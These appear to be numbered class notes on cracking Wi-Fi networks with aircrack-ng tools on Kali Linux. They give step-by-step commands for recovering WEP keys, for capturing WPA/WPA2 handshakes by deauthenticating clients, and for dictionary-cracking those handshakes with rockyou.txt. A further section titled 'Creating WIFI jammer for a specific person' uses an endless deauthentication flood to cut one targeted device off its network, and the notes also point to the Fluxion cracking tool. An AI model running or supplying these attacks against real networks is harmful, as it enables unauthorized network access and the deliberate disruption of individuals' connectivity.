g1s20

1. SESSION 20
2. ===========
3.  
4. REQUIREMENTS FOR CRACKING WIRELESS NETWORKS
5. ============================================
6.  
7. OS : Kali Linux
8. Hardware Components : Wireless Adapter that supports Monitor Mode (Using "Leoxsys 150 HGN")
9. Tools : (CLI Tools Pre-Installed in Kali Linux)
10. - Airmon-ng : For Enabling Monitor Mode.
11. - Airodump-ng : For Dumping Wireless Fidelity Packets.
12. - Aireplay-ng : For generating frames/packets and altering with Network Packets.
13. - Aircrack-ng : For Doing Brute Force Attack on the WIFI Captured Packets through the help of a Wordlists.
14.  
15.  
16. Aireplay-ng
17. ============
18. Aireplay-ng is used to inject/replay frames. The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake authentications etc.
19.  
20.  
21. Aircrack-ng
22. ===========
23. Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program. It can recover the WEP key once enough encrypted packets have been captured with airodump-ng. This uses methods incorporates various statistical attacks to discover the WEP key and uses these in combination with brute forcing. Additionally, the program offers a dictionary method for determining the WEP key. For cracking WPA/WPA2 pre-shared keys, a wordlist (file having credentials) has to be used.
24.  
25.  
26. Workflow for Cracking WEP, WPA/WPA2:
27. ====================================
28.  
29. Step 1: To start the monitor mode.
30. Step 2: To start gathering information about the wireless signals.
31. Step 3: To start capturing the packets.
32. Step 4: Cracking the WiFi password.
33.  
34.  
35. --------------------------------------------------------------------------------------------------
36.  
37.  
38. CRACKING WEP ENCRYPTION
39. ========================
40.  
41. Steps :
42.  
43. # iwconfig // Wireless Adapter Name wlan0
44.  
45. # airmon-ng start wlan0 // Starting Monitoring Mode on Adapter
46.  
47. # kill PID // Killing processes
48.  
49. # iwconfig // After Monotoring mode adapter name is : wlan0mon
50.  
51. # airodump-ng wlan0mon // Starting Dumping on Wireless Adapter
52.  
53. # airodump-ng --bssid <Target Router's bssid> -c <channel number> -w wepp wlan0mon // saving dumping packets to a file.
54. --bssid : router's mac address
55. -c : channel number
56. -w : writing/capturing wireless packets
57. (This will automatically adds -01,-02 in addition to the file name. Here it'll be wepp-01.cap .)
58.  
59. # aireplay-ng -1 0 -a <bssid of my wep router> wlan0mon // Sending Re-authentication packets to the router
60.  
61. NOTE : There must be atleast 15,000 Beacon Packets Captured.
62.  
63. # aircrack-ng wepp-01.cap // Cracking Stored WEP Packets
64.  
65.  
66. The key will be found with (:) in between. For eg. If the passphrase of the access point is "1234567890" , the Cracked Key will be shown as "12:34:56:78:90" .
67. Remove the (:) sign from the KEY Founded, and the password will be in front of you.
68.  
69.  
70. --------------------------------------------------------------------------------------------------
71.  
72.  
73. CRACKING WPA/WPA2
74. ==================
75.  
76. Steps :
77.  
78. # iwconfig // Wireless Adapter Name wlan0
79.  
80. # airmon-ng start wlan0 // Starting Monitoring Mode on Adapter
81.  
82. # kill PID // Killing processes
83.  
84. # iwconfig // After Monotoring mode adapter name is : wlan0mon
85.  
86. # airodump-ng wlan0mon // Starting Dumping on Wireless Adapter
87.  
88. # airodump-ng --bssid <Target Router's bssid> -c <channel number> -w wpa2 wlan0mon // saving dumping packets to a file.
89. --bssid : router's mac address
90. -c : channel number
91. -w : to write/capture packets
92. (This will automatically adds -01,-02 in addition to the file name. Here it'll be wpa2-01.cap .)
93.  
94. # aireplay-ng -0 10 -a <bssid of router> -c <bssid of client/user> wlan0mon // Sending deauthentication packets to the client/user of a router.
95. -0 : deauthentication packet
96. -a : mac of target router
97. -c : mac of any connected client/user
98. (Now we are sending 10 Deauthentication Packets to the client, after that if the client again tries to reconnect, the WIFI Handshake will be captured of that access point.)
99.  
100. # aircrack-ng -w <path of dictionary> <filename*.cap> //Starting Dictionary Attack through a Wordlists
101. Wordlists we are using is Rockyou.txt which is pre-installed in kali linux. Path of rockyou.txt is : /usr/share/wordlist/rockyou.txt/ .
102.  
103. This will be showing you the password as (KEY FOUND : Password of the Access Point).
104.  
105.  
106. --------------------------------------------------------------------------------------------------
107.  
108. CREATING WIFI JAMMER FOR A SPECIFIC PERSON
109. ==========================================
110.  
111. # airodump-ng -c <chanel number> -w file --bssid <bssid of router> wlan0mon
112.  
113. # aireplay-ng --deauth 0 -c <bssid of a specific device> -a <bssid of the router> wlan0mon
114.  
115. --------------------------------------------------------------------------------------------------
116.  
117. Other Automated Tool For Wireless Cracking :
118.  
119. FLUXION - https://github.com/FluxionNetwork/fluxion
120. Only for Linux OS.
121.  
122.  
123. --------------------------------------------------------------------------------------------------
124.  
125.  
126.  
127.  
128. UNHACK - https://apkpure.com/unhack/com.lucideustech.unhack